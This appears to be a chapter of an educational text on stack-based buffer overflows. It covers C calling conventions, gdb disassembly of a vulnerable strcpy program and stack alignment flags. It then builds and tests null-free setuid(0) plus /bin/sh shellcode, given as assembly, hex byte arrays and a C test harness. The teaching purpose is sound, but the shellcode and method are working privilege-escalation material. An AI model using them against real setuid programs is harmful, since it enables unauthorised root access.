3.5 C Function Call Convention
3.6 Stack Boundary Alignment
3.7 Generating and Testing the Shellcode as a Payload
3.5 C Function Call Convention
In order to understand how the stack operates, it is very useful to learn the operation of the function call and how the stack frame for a function is constructed and destroyed from programming language perspective. As a convention, for every C function call [60], [61] there will be a creation of a stack frame. A convention is a followed practice that is standardized, but not a documented and gazetted standard. Compilers have some conventions used for function call. Actually, this is not just a convention because as discussed in section 2.5.3, the conventions used should be in accordance with the processor’s execution environment. For example, the C function calling convention tells the compiler things such as:
1. The order in which function arguments are pushed onto the stack. 2. Whether the caller or called function (callee) responsibility to remove the arguments from the stack at the end of the call that is the stack cleanup process. 3. The name-decorating convention that the compiler uses to identify individual functions.
The examples of calling conventions used in C compilers are __stdcall, __pascal, __cdecl and __fastcall (for Microsoft Visual C++). The calling convention belongs to a function's signature, thus functions with different calling conventions are incompatible with each other. Currently, there is no standard for C naming between different compiler vendors or even between different versions of compiler for function calling scheme. That is why if the object files compiled with other compiler been linked, may not produce the same naming scheme and thus causes unresolved external. For Borland and Microsoft compilers a specific calling convention between the return type and the function's name can be specified as shown below.
For the GNU GCC the __attribute__ keyword can be used by writing the function definition followed by the keyword __attribute__ and then state the calling convention in double parentheses as shown below.
|
The following Table summarizes the C function calling conventions used in modern compilers whether commercial or open source.
Table 3.1: C function call convention
keyword | Stack cleanup | Parameter passing |
__cdecl | caller | - Pushes parameters on the stack, in reverse order (right to left). - Caller cleans up the stack. This is the default calling convention for C language that supports variadic functions (variable number of argument or type list such as printf()) and also C++ programs. - The __cdecl calling convention creates larger executables than __stdcall, because it requires each function call to include stack cleanup code. |
__stdcall | callee | - Also known as __pascal. - Pushes parameters on the stack, in reverse order (right to left). - Functions that use this calling convention require a function prototype. - Callee cleans up the stack. - It is standard convention used in Win32 API functions. |
__fastcall | callee | - Parameters stored in registers, then pushed on stack. - The __fastcall calling convention specifies that arguments to functions are to be passed in registers, when possible. - Callee cleans up the stack. |
Each instance of the function calls will have its own frame (also called activation record in general) on the stack. In general, the type of data which may be available in activation record is shown in Figure 3.14 and Table 3.2 summarizes the data types. A complete general information and specific programming language implementations can be found in [60], [61].
Figure 3.14:A general type of data that might appear in an activation record
Table 3.2: Activation record data description
Data | Description |
Temporaries values | Such as yield from the evaluation of expressions, in cases when those temporaries cannot be held in registers. |
Local data | Belonging to the function whose activation record is. |
A saved machine status | Information about the state of the machine just before the call to the function. Typically includes the return address (value of the program counter, to which the called function must return) and the contents of registers that were used by the caller and must be restored when the return occurs. |
An access link | May be needed to locate data needed by the called function but found elsewhere e.g. in another activation record |
A control link | Pointing to the activation record of the caller. |
Space for the return value | This is for the callee, if any. Again, not all called functions return a value, and if one does, may be preferred to place that value in a register for efficiency. |
The actual parameters | Used by the caller. Normally stored in registers, when possible. |
Specific to C, the code that executed by the caller immediately before and after the function call normally called “calling sequence” subroutine. The code that executed at the beginning of the subroutine normally called prologue and code executed at the end normally called epilogue. Practically, C function calls are made with the caller pushing arguments onto the stack, calling the function and then popping the stack to clean up those pushed arguments. The following generic assembly code snippets show the __cdecl and __stdcall example and this should tally with the processor’s execution environment for stack setup discussed in section 2.5.3.3.
/* example of __cdecl */
push arg_2
push arg_1
call function ; stack frame setup
...
sub ebp, 12 ; allocated buffer
...
add ebp, 12 ; stack cleanup
/* example of __stdcall */
push arg_2
push arg_1
call function ; stack frame setup
...
sub ebp, 12 ; allocated buffer
...
/* no stack cleanup, it will be done by caller */
These assembly snippets explain how the stack frame is constructed during the function call as depicted in Figure 4. Using the __cdecl, the ebp has been subtracted by 12 bytes for the buffer allocation and during the clean up, the 12 bytes will be re-added for the de-allocation. If those calling conventions are not explicitly stated or set, the default, __cdecl will be used as normally used by most programmer. The following Figure shows the default calling convention used in Microsoft Visual Studio IDE.
Figure 3.15: C calling convention setting in Microsoft Visual Studio IDE
Back to the vulnerable code, the difference between the real allocated buffer compared to the declared buffer should be noted. In the program, an array of 512 bytes in size was declared that suppose to hold maximum of 512 characters type data. However, depending on the stack growth multiplier of the compiler, the default used is 4 words. By disassembling the source code, this can be verified.
[amad@localhost projectbof11]$ gdb -q bofvulcode
(gdb) disas main
Dump of assembler code for function main:
0x08048424 <main+0>: lea 0x4(%esp),%ecx
0x08048428 <main+4>: and $0xfffffff0,%esp
0x0804842b <main+7>: pushl -0x4(%ecx)
0x0804842e <main+10>: push %ebp
0x0804842f <main+11>: mov %esp,%ebp
0x08048431 <main+13>: push %ecx
0x08048432 <main+14>: sub $0x214,%esp
0x08048438 <main+20>: mov %ecx,-0x208(%ebp)
0x0804843e <main+26>: mov -0x208(%ebp),%eax
0x08048444 <main+32>: cmpl $0x1,(%eax)
0x08048447 <main+35>: jg 0x8048470 <main+76>
0x08048449 <main+37>: mov -0x208(%ebp),%edx
0x0804844f <main+43>: mov 0x4(%edx),%eax
0x08048452 <main+46>: mov (%eax),%eax
0x08048454 <main+48>: mov %eax,0x4(%esp)
0x08048458 <main+52>: movl $0x8048584,(%esp)
0x0804845f <main+59>: call 0x8048344 <printf@plt>
0x08048464 <main+64>: movl $0x0,(%esp)
0x0804846b <main+71>: call 0x8048354 <exit@plt>
0x08048470 <main+76>: mov -0x208(%ebp),%edx
0x08048476 <main+82>: mov 0x4(%edx),%eax
0x08048479 <main+85>: add $0x4,%eax
0x0804847c <main+88>: mov (%eax),%eax
0x0804847e <main+90>: mov %eax,0x4(%esp)
0x08048482 <main+94>: lea -0x204(%ebp),%eax
0x08048488 <main+100>: mov %eax,(%esp)
0x0804848b <main+103>: call 0x8048334 <strcpy@plt>
0x08048490 <main+108>: lea -0x204(%ebp),%eax
0x08048496 <main+114>: mov %eax,0x4(%esp)
0x0804849a <main+118>: movl $0x80485a7,(%esp)
0x080484a1 <main+125>: call 0x8048344 <printf@plt>
0x080484a6 <main+130>: mov $0x0,%eax
0x080484ab <main+135>: add $0x214,%esp
0x080484b1 <main+141>: pop %ecx
0x080484b2 <main+142>: pop %ebp
0x080484b3 <main+143>: lea -0x4(%ecx),%esp
0x080484b6 <main+146>: ret
End of assembler dump.
(gdb)
Figure 3.16: Viewing the ‘real’ allocated buffer for the declared array
It is clear that the actual allocated buffer is 0x214 (532 bytes = 532 x 8 bits = 4256/32 = 133 words). The default is 4 (2 power to 2 that equal to 16 bytes or 128 bits) for this GCC version. This default stack growth can be changed by using the following GCC option.
-mpreferred-stack-boundary=num
Which the compiler will attempt to keep the stack boundary aligned to a 2 raised to num byte boundary. As the default, the stack is required to be aligned on a 4 byte boundary. Referring to the GCC documentation:
"To ensure proper alignment of these values on the stack, the stack boundary must be as aligned as that required by any value stored on the stack. Further, every function must be generated such that it keeps the stack aligned. Thus calling a function compiled with a higher preferred stack boundary from a function compiled with a lower preferred stack boundary will most likely misalign the stack. It is recommended that libraries that use callbacks always use the default setting.
This extra alignment does consume extra stack space. Code that is sensitive to stack space usage, such as embedded systems and operating system kernels, may want to reduce the preferred alignment to '-mpreferred-stack-boundary=2'."
This thing is very important if the malicious code will be stored in the stack itself as used in the classic stack-based buffer overflow. The actual allocated buffer for the declared array in the program needs to be known so that the string input size and arrangement can be properly prepared and setup. However, in the case where the return address is pointing back to the stack’s buffer, two options are available:
1. Use the -mpreferred-stack-boundary=num gcc option to lower the preferred stack boundary or
2. Padding more No Operation (NOP) instruction into the shellcode.
In this demo the preferred stack boundary will be lowered to 2. The steps for this task are shown below.
[amad@localhost projectbof11]$ gcc -w -g -mpreferred-stack-boundary=2 bofvulcode.c -o bofvulcode
[amad@localhost projectbof11]$ gdb -q bofvulcode
(gdb) disas main
Dump of assembler code for function main:
0x08048424 <main+0>: push %ebp
0x08048425 <main+1>: mov %esp,%ebp
0x08048427 <main+3>: sub $0x208,%esp
0x0804842d <main+9>: cmpl $0x1,0x8(%ebp)
0x08048431 <main+13>: jg 0x8048454 <main+48>
0x08048433 <main+15>: mov 0xc(%ebp),%eax
0x08048436 <main+18>: mov (%eax),%eax
0x08048438 <main+20>: mov %eax,0x4(%esp)
0x0804843c <main+24>: movl $0x8048554,(%esp)
0x08048443 <main+31>: call 0x8048344 <printf@plt>
0x08048448 <main+36>: movl $0x0,(%esp)
0x0804844f <main+43>: call 0x8048354 <exit@plt>
0x08048454 <main+48>: mov 0xc(%ebp),%eax
0x08048457 <main+51>: add $0x4,%eax
0x0804845a <main+54>: mov (%eax),%eax
0x0804845c <main+56>: mov %eax,0x4(%esp)
0x08048460 <main+60>: lea -0x200(%ebp),%eax
0x08048466 <main+66>: mov %eax,(%esp)
0x08048469 <main+69>: call 0x8048334 <strcpy@plt>
0x0804846e <main+74>: lea -0x200(%ebp),%eax
0x08048474 <main+80>: mov %eax,0x4(%esp)
0x08048478 <main+84>: movl $0x8048577,(%esp)
0x0804847f <main+91>: call 0x8048344 <printf@plt>
0x08048484 <main+96>: mov $0x0,%eax
0x08048489 <main+101>: leave
0x0804848a <main+102>: ret
End of assembler dump.
(gdb)
Figure 3.17: Viewing the ‘real’ allocated buffer after lowering the preferred stack boundary
Well, 0x208 (520) bytes were allocated for the 512 bytes declared buffer. This issue does not affect the program used in this demonstration because the vulnerable program’s stack is not used to store the malicious shellcode; environment variable will be used instead. However this knowledge is important for determining the exact return address (ebp + 4).
The shellcode used in this demo is a typical setuid and spawning a shell program. Various type of shellcode can be generated easily using the Metasploit framework [52]. Take note that the assembly used is based on AT & T (AT&T and Intel differences,from RedHat,another one) version. Basically this shellcode contains three parts: displaying some characters, executing setuid(0) and invoking the /bin/sh. To ensure the root privilege of the vulnerable setuid program is retained, the setuid(0) will be run before invoking the /bin/sh. The assembly code (testasm.s) used is shown in the following code listing and it is a modified version of the [62]. The comments should be self-explanatory. The reasons on using the assembly are the small file size and faster execution speed.
# using the .data section for write permission
# instead of .text section
.section .data
.globl _start
_start:
# displaying some characters for watermarking :-)
xor %eax,%eax # clear eax by setting eax to 0
xor %ebx,%ebx # clear ebx by setting ebx to 0
xor %edx,%edx # clear edx by setting edx to 0
push %ebx # push ebx into the stack,
# base pointer
# for the stack frame
push $0xa696e55 # push U-n-i characters
push $0x4d555544 # push M-U-U-D characters
push $0x414d4841 # push A-M-H-A characters
movl %esp,%ecx # move the sp to ecx
movb $0xf,%dl # move 15 to dl (low d), it is the
# string length,
# notice the use of movb - move byte,
# this is to avoid null
movb $0x4,%al # move 4 to al (low l),
# 4 is system call
# number for write(int fd, char *str,
# int len)
int $0x80 # call kernel/syscall
# setuid(0)
xor %eax,%eax # clear eax by setting eax to 0
xor %ebx,%ebx # clear ebx by setting ebx to 0
xor %ecx,%ecx # clear ecx by setting ecx to 0
movb $0x17,%al # move 0x17 into al - setuid(0)
int $0x80 # call kernel/syscall
jmp do_call # jump to get the address with
# the call trick
jmp_back:
pop %ebx # ebx (base pointer=stack
# frame pointer) has the address
# of our string, use it to index
xor %eax,%eax # clear eax by setting eax to 0
movb %al,7(%ebx) # put a null at the N or shell[7]
movl %ebx,8(%ebx) # put the address of our
# string (in ebx) into shell[8]
movl %eax,12(%ebx) # put the null at shell[12]
# our string now looks something like
# "/bin/sh\0(*ebx)(*0000)"
xor %eax,%eax # clear eax by setting eax to 0
movb $11,%al # put 11 which is execve
# syscall number into al
leal 8(%ebx),%ecx # put the address of XXXX
# i.e. (*ebx) into ecx
leal 12(%ebx),%edx # put the address of YYYY
# i.e. (*0000) into edx
int $0x80 # call kernel/syscall
do_call:
call jmp_back
shell:
.ascii "/bin/shNXXXXYYYY"
Figure 3.18: The shellcode file content screenshot
Next, let assemble, link and run the assembly program to verify that the purpose is fulfilled. The following steps show how to assemble, link the object file and run the binary.
[amad@localhost testassembly]$ as testasm.s -o testasm.o
[amad@localhost testassembly]$ ld testasm.o -o testasm
[amad@localhost testassembly]$ ./testasm
AHMADUUMUni
sh-3.2$ pwd
/home/amad/Public/testassembly
sh-3.2$ exit
exit
Look likes the assembly works fine. Next, in order to get the opcodes the object file need to dumped using objdump tool. These opcodes will be used in the next C program as char array of hex. Take note that the assembly code can be used directly in the C program using the asm keyword, however the program will be larger. The following code snippet shows the steps.
[amad@localhost testassembly]$ objdump -D testasm
testasm: file format elf32-i386
Disassembly of section .data:
08049054 <_start>:
8049054: 31 c0 xor %eax,%eax
8049056: 31 db xor %ebx,%ebx
8049058: 31 d2 xor %edx,%edx
804905a: 53 push %ebx
804905b: 68 55 6e 69 0a push $0xa696e55
8049060: 68 44 55 55 4d push $0x4d555544
8049065: 68 41 48 4d 41 push $0x414d4841
804906a: 89 e1 mov %esp,%ecx
804906c: b2 0f mov $0xf,%dl
804906e: b0 04 mov $0x4,%al
8049070: cd 80 int $0x80
8049072: 31 c0 xor %eax,%eax
8049074: 31 db xor %ebx,%ebx
8049076: 31 c9 xor %ecx,%ecx
8049078: b0 17 mov $0x17,%al
804907a: cd 80 int $0x80
804907c: eb 18 jmp 8049096 <do_call>
0804907e <jmp_back>:
804907e: 5b pop %ebx
804907f: 31 c0 xor %eax,%eax
8049081: 88 43 07 mov %al,0x7(%ebx)
8049084: 89 5b 08 mov %ebx,0x8(%ebx)
8049087: 89 43 0c mov %eax,0xc(%ebx)
804908a: 31 c0 xor %eax,%eax
804908c: b0 0b mov $0xb,%al
804908e: 8d 4b 08 lea 0x8(%ebx),%ecx
8049091: 8d 53 0c lea 0xc(%ebx),%edx
8049094: cd 80 int $0x80
08049096 <do_call>:
8049096: e8 e3 ff ff ff call 804907e <jmp_back>
0804909b <shell>:
804909b: 2f das
804909c: 62 69 6e bound %ebp,0x6e(%ecx)
804909f: 2f das
80490a0: 73 68 jae 804910a <_end+0x5e>
80490a2: 4e dec %esi
80490a3: 58 pop %eax
80490a4: 58 pop %eax
80490a5: 58 pop %eax
80490a6: 58 pop %eax
80490a7: 59 pop %ecx
80490a8: 59 pop %ecx
80490a9: 59 pop %ecx
80490aa: 59 pop %ecx
[amad@localhost testassembly]$
Figure 3.19: Dumping the Hex representation using objdump tool
Then, re-arrange the opcodes in hex. There must be no null, \x00 (string terminator) in this shellcode which can terminate the execution. In real exploit, the shellcode should be as smaller as possible to exploit the limited space which mostly available for storage and in addition increases the execution speed.
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x44\x55"
"\x55\x4d\x68\x41\x48\x4d\x41\x89\xe1\xb2\x0f\xb0\x04\xcd\x80\x31"
"\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x18\x5b\x31\xc0\x88\x43"
"\x07\x89\x5b\x08\x89\x43\x0c\x31\xc0\xb0\x0b\x8d\x4b\x08\x8d\x53"
"\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e"
"\x58\x58\x58\x58\x59\x59\x59\x59"
Next, use this shellcode as a char array in the C program (testmyasm.c) for testing as shown in the following code.
#include <unistd.h>
char shcode[] = "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x44\x55"
"\x55\x4d\x68\x41\x48\x4d\x41\x89\xe1\xb2\x0f\xb0\x04\xcd\x80\x31"
"\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x18\x5b\x31\xc0\x88\x43"
"\x07\x89\x5b\x08\x89\x43\x0c\x31\xc0\xb0\x0b\x8d\x4b\x08\x8d\x53"
"\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e"
"\x58\x58\x58\x58\x59\x59\x59\x59";
int main(int argc, char **argv)
{
int (*ret)(); /* creating a function pointer, ret */
ret = (int(*)())shcode; /* ret points to our shellcode that
/* casted to a function */
(int)(*ret)(); /* execute as function shcode[] */
exit(0); /* exit peacefully */
}
Then, compile and run this program as shown in the following steps.
[amad@localhost testassembly]$ gcc -w -g testmyasm.c -o testmyasm
[amad@localhost testassembly]$ ./testmyasm
AHMADUUMUni
sh-3.2$ id
uid=500(amad) gid=500(amad) groups=500(amad)
sh-3.2$ whoami
amad
sh-3.2$
sh-3.2$
sh-3.2$ exit
exit
[amad@localhost testassembly]$
Figure 3.20 shows the screenshot for the previous task.
Figure 3.20: Screenshot for the shellcode testing
The shellcode works fine, so the NXXXXYYYY portion after the /bin/sh that just to make it easier for the assembly coding in getting the address of the string and reserving the necessary space can be discarded. By removing the string part of the opcode, the left shellcode is shown below.
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x44\x55\x55"
"\x4d\x68\x41\x48\x4d\x41\x89\xe1\xb2\x0f\xb0\x04\xcd\x80\x31\xc0"
"\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x18\x5b\x31\xc0\x88\x43\x07"
"\x89\x5b\x08\x89\x43\x0c\x31\xc0\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c"
"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
Re-compile and re-run the program with this new little bit 'smaller' shellcode.
[amad@localhost testassembly]$ cat asmshellcodefinal.c
#include <unistd.h>
char shcode[] = "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x44\x55\x55"
"\x4d\x68\x41\x48\x4d\x41\x89\xe1\xb2\x0f\xb0\x04\xcd\x80\x31\xc0"
"\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x18\x5b\x31\xc0\x88\x43\x07"
"\x89\x5b\x08\x89\x43\x0c\x31\xc0\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c"
"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main(int argc, char **argv)
{
int (*ret)();
ret = (int(*)())shcode;
(int)(*ret)();
exit(0);
}
[amad@localhost testassembly]$ gcc -w -g asmshellcodefinal.c -o asmshellcodefinal
[amad@localhost testassembly]$ ./asmshellcodefinal
AHMADUUMUni
sh-3.2$
sh-3.2$
sh-3.2$ id
uid=500(amad) gid=500(amad) groups=500(amad)
sh-3.2$ whoami
amad
sh-3.2$ exit
exit
[amad@localhost testassembly]$
Figure 3.21: Running the shellcode screenshots
Well, the shellcode looks fine.